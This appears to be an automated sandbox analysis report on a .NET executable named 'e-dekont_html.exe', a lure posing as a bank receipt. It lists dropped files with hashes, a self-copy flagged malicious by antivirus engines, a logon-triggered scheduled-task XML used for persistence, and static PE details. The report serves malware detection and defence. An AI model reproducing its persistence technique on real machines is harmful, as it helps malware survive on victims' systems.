                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fahKSvwo.exe.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1216
                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2232
                                                                                                                                                        Entropy (8bit):5.380134126512796
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:+WSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:+LHxvIIwLgZ2KRHWLOuggs
                                                                                                                                                        MD5:2A51987DAFE4586D09FC4BE0507F6B71
                                                                                                                                                        SHA1:AE3D26F5D8A78CB88E29ADEC340C56A0F6B3D3B7
                                                                                                                                                        SHA-256:2EBC59B6B9D301FBFDD52FA8CF1C811F7814C4F24943D6BC3F5FD7B8529F8D16
                                                                                                                                                        SHA-512:F1D8BFF693D16BEEE9D0C06CEA7CD925CACB33170201A35BC01099BA4225BB26EAE347213F9C29DF3E320CE0DD1D299D5B735D089145EE1E188A8024F62F78C3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz120nfz.j4v.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrnkzrin.mp3.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksvqv0pp.2er.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpgolwsw.511.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2byhtnc.1s3.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4rhnfbd.ktt.ps1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaevxprt.bw5.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbt02phu.xls.psm1

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp7653.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1574
                                                                                                                                                        Entropy (8bit):5.1089451320984685
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta8Rxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT3v
                                                                                                                                                        MD5:940AF28B4D86EE6583C9513B54BBCE43
                                                                                                                                                        SHA1:92B5A067E5A4FFB66D9BC778E35967BECB327F0F
                                                                                                                                                        SHA-256:63968750CB9EE6D99982934580342E7744C4B573F5B823483EF610217883AEE2
                                                                                                                                                        SHA-512:B5C520EAA53C5382FFCB684F3CFF35C1C655268408BDFE0C8C02D650B333CE7746768E6B3D4F36544B16F5B25040BD76DC78D0F4EB4C698C48CF0BC8D5669BA5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp8A49.tmp

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\fahKSvwo.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1574
                                                                                                                                                        Entropy (8bit):5.1089451320984685
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta8Rxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT3v
                                                                                                                                                        MD5:940AF28B4D86EE6583C9513B54BBCE43
                                                                                                                                                        SHA1:92B5A067E5A4FFB66D9BC778E35967BECB327F0F
                                                                                                                                                        SHA-256:63968750CB9EE6D99982934580342E7744C4B573F5B823483EF610217883AEE2
                                                                                                                                                        SHA-512:B5C520EAA53C5382FFCB684F3CFF35C1C655268408BDFE0C8C02D650B333CE7746768E6B3D4F36544B16F5B25040BD76DC78D0F4EB4C698C48CF0BC8D5669BA5
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                        C:\Users\user\AppData\Roaming\fahKSvwo.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):709120
                                                                                                                                                        Entropy (8bit):7.9449809569809435
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:3kMEo7ji/Ov/qIwJbBcWnusvfmWzoHsDR085/RpKKnKbKBA5A2fXG:3kDo7xSKWnueX1RN5/RDndB7g
                                                                                                                                                        MD5:3C1D34A25A8B8A96896E746F13C346BF
                                                                                                                                                        SHA1:31C17EEBFFBCB57A3A833C99541748E508D82714
                                                                                                                                                        SHA-256:7BD9596F753E58BA917BA418C191AF8FCB9B537E73EE6A86989960099585394F
                                                                                                                                                        SHA-512:3854B5186E2A7BED2FF290C8DDCAB311FD3B431CA3AE8A5BCE2322907731A9C105316FF43E15DC2EBA870AB8948E097C37AFD77F21A5CFD7D148FC0378F4A847
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 67%, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?<g..............0.................. ........@.. ....................... ............@.....................................O.......................................T............................................ ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........}...O......i....................................................0..$..........s......s.....s ......o!...&..+..*.0..)........s\....s.......o[...s......o".......+...*....0..+........s\....r...p.(#......o[...s......o$....+..*..0..0........s\....rC..p.r...p(%......o[...s......o$....+..*.0...........s\.......O...%.r...p.%...%.r...p.%...%.r...p.%....%.r!..p.%....%.r;..p.%.....%..rU..p.%.....%..ry..p.%....%..r...p.(&......o[...s.......o$...&r...p('...&......o(...('...&...*.

                                                                                                                                                        C:\Users\user\AppData\Roaming\fahKSvwo.exe:Zone.Identifier

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\e-dekont_html.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26
                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                        Static File Info

                                                                                                                                                        General

                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                        Entropy (8bit):7.9449809569809435
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                        File name:e-dekont_html.exe
                                                                                                                                                        File size:709'120 bytes
                                                                                                                                                        MD5:3c1d34a25a8b8a96896e746f13c346bf
                                                                                                                                                        SHA1:31c17eebffbcb57a3a833c99541748e508d82714
                                                                                                                                                        SHA256:7bd9596f753e58ba917ba418c191af8fcb9b537e73ee6a86989960099585394f
                                                                                                                                                        SHA512:3854b5186e2a7bed2ff290c8ddcab311fd3b431ca3ae8a5bce2322907731a9c105316ff43e15dc2eba870ab8948e097c37afd77f21a5cfd7d148fc0378f4a847
                                                                                                                                                        SSDEEP:12288:3kMEo7ji/Ov/qIwJbBcWnusvfmWzoHsDR085/RpKKnKbKBA5A2fXG:3kDo7xSKWnueX1RN5/RDndB7g
                                                                                                                                                        TLSH:8AE4125025D44FA6F0BE8BF1D261A00433F57D76B831F64D4EE330EE2AA9F514922A67
                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?<g..............0.................. ........@.. ....................... ............@................................

                                                                                                                                                        File Icon

                                                                                                                                                        Icon Hash:4f81888c8c89874f

                                                                                                                                                        Static PE Info

                                                                                                                                                        General

                                                                                                                                                        Entrypoint:0x4ad51a
                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x673C3FA8 [Tue Nov 19 07:35:04 2024 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:4
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:4
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                        Data Directories

                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xad4c50x4f.text
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x1794.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xab3c00x54.text
